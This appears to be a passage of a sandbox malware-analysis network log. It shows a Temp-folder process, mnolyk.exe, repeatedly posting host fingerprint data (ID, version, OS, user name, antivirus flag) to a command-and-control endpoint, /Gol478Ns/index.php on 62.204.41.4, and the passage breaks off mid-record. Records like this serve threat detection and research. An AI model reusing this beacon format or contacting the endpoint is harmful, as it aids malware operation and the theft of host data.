                                                                      Date: Mon, 06 Feb 2023 17:38:39 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      599192.168.2.75032862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:39.535774946 CET1066OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:39.604188919 CET1066INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:39 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      6192.168.2.74973062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:35:58.016248941 CET438OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:35:58.084274054 CET438INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:35:58 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      60192.168.2.74978562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:12.181175947 CET498OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:12.247046947 CET499INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:12 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      600192.168.2.75032962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:39.784785032 CET1067OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:39.848402023 CET1067INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:39 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      601192.168.2.75033062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:40.019565105 CET1068OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:40.085058928 CET1068INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:40 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      602192.168.2.75033162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:40.257821083 CET1069OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:40.322891951 CET1069INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:40 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      603192.168.2.75033262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:40.516329050 CET1070OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:40.580770016 CET1070INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:40 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      604192.168.2.75033362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:40.754988909 CET1071OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:40.820499897 CET1071INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:40 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      605192.168.2.75033462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:41.003923893 CET1072OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:41.070502996 CET1072INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:41 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      606192.168.2.75033562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:41.243352890 CET1073OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:41.308324099 CET1073INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:41 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      607192.168.2.75033662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:41.486984015 CET1074OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:41.549911976 CET1074INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:41 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      608192.168.2.75033762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:41.721827984 CET1075OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:41.788013935 CET1075INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:41 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      609192.168.2.75033862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:41.974958897 CET1076OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:42.040513039 CET1076INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:42 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      61192.168.2.74978662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:12.426489115 CET499OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:12.490788937 CET500INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:12 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      610192.168.2.75033962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:42.208795071 CET1077OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:42.271629095 CET1077INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:42 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      611192.168.2.75034062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:42.464571953 CET1078OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:42.527338982 CET1078INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:42 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      612192.168.2.75034162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:42.838469982 CET1079OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:42.901577950 CET1079INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:42 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      613192.168.2.75034262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:43.108288050 CET1080OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:43.174962044 CET1080INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:43 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      614192.168.2.75034362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:43.443139076 CET1081OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:43.510194063 CET1081INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:43 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      615192.168.2.75034462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:44.257733107 CET1082OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
